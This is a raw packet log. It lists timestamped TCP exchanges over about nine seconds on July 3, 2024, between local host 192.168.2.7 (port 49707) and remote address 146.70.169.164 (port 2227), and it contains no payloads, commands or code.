Jul 3, 2024 18:02:01.376018047 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.423974037 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.424107075 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.471920013 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.472088099 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.523992062 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.524082899 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.575977087 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.576050997 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.623945951 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.624377012 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.672007084 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.672082901 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.719948053 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.719995975 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.767959118 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.768054962 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.815888882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.815972090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.864128113 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.864191055 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.915965080 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.916026115 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.969182968 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.972707033 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.023915052 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.024017096 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.076374054 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.077198982 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.127901077 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.128001928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.176126003 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.176294088 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.223915100 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.223988056 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.271922112 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.272070885 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.320185900 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.320256948 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.371961117 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.372035027 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.674460888 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.674591064 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.679692984 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.679774046 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.731914043 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.732065916 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.783947945 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.784082890 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.832089901 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.832274914 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.879898071 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.880491018 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.928128004 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.928226948 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:02.975915909 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:02.976030111 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.023904085 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.023961067 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.071945906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.072051048 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.120071888 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.120171070 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.167879105 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.168014050 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.215888023 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.216017008 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.264122009 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.264331102 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.312022924 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.312212944 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.360234022 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.360399961 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.407924891 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.408023119 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.456105947 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.456713915 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.503927946 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.504591942 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.553603888 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.553774118 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.601114035 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.606041908 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.652918100 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.653038979 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.704386950 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.708509922 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.760622025 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.761341095 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.807900906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.807970047 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.855952978 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.857036114 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.903897047 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.904165983 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.951944113 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:03.952052116 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:03.999896049 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.000138998 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.047991991 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.050077915 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.096003056 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.098010063 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.145020962 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.146047115 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.191907883 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.192136049 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.243962049 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.244021893 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.292010069 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.292154074 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.344858885 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.344980001 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.396047115 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.396132946 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.443962097 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.444021940 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.492059946 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.492186069 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.539961100 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.540014029 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.587992907 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.588044882 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.635919094 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.635981083 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.683888912 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.683948994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.731988907 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.732043028 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.779881001 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.779933929 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.831964970 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.832020998 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.884128094 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.884177923 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.932231903 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.932297945 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:04.983880997 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:04.983927011 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.035877943 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.036041021 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.084002018 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.084068060 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.135850906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.135901928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.184824944 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.184901953 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.231884956 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.231976986 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.283907890 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.283957005 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.331926107 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.332077980 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.636154890 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.753038883 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.753173113 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.760930061 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.761646986 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.761707067 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.812009096 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.812063932 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.859910011 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.859971046 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.908123016 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.908185959 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:05.956082106 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:05.956149101 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.003985882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.004046917 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.052045107 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.052104950 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.103902102 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.103981972 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.158354044 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.158415079 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.204014063 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.204109907 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.251986980 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.252082109 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.299957037 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.300051928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.347950935 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.348021984 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.395977020 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.396049976 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.443912029 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.443983078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.492155075 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.492234945 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.539946079 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.540024042 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.587886095 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.588007927 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.637774944 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.637877941 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.689990997 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.690080881 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.735898972 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.736208916 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.788337946 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.788397074 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.835987091 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.838118076 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.887978077 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.890029907 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.939899921 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.941118002 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:06.988466024 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:06.990084887 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.039920092 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.042006016 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.088447094 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.089693069 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.140182018 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.142025948 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.193481922 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.193547010 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.239917994 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.242016077 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.287980080 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.288049936 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.335908890 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.336018085 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.384701967 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.384819031 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.432559013 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.432677984 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.479952097 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.480082989 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.527947903 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.528062105 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.576044083 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.576159954 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.628019094 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.628174067 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.676067114 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.676198006 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.724046946 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.724093914 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.776070118 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.776118994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:07.824029922 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:07.824213028 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.092699051 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.092756987 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.098436117 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.100037098 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.156024933 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.156076908 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.207937956 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.208092928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.255928040 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.256023884 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.307962894 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.308064938 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.355961084 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.356040001 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.403877020 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.403985023 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.455899954 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.455988884 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.503926992 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.504014969 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.551862955 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.551923990 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.599890947 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.599980116 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.647841930 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.647895098 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.699896097 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.699954033 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.748009920 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.748075962 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.795960903 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.796096087 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.847892046 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.847949982 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.895930052 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.895992994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.947909117 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:08.947959900 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:08.999949932 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.000036001 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.047844887 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.047941923 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.095983028 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.096050978 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.146075964 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.146213055 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.200001955 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.200092077 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.254205942 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.255080938 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.305329084 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.305388927 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.352463961 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.352523088 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.403990030 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.404117107 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.458018064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.458410978 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.512959957 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.513025045 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.564690113 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.564804077 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.611897945 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.611970901 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.663997889 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.664041996 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.712069035 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.712117910 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.759937048 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.760003090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.807884932 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.807931900 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.862199068 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.862332106 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.908072948 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.908271074 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:09.958070040 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:09.958117962 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.007986069 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.008704901 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.059952974 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.060295105 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.107917070 CEST	2227	49707	146.70.169.164	192.168.2.7
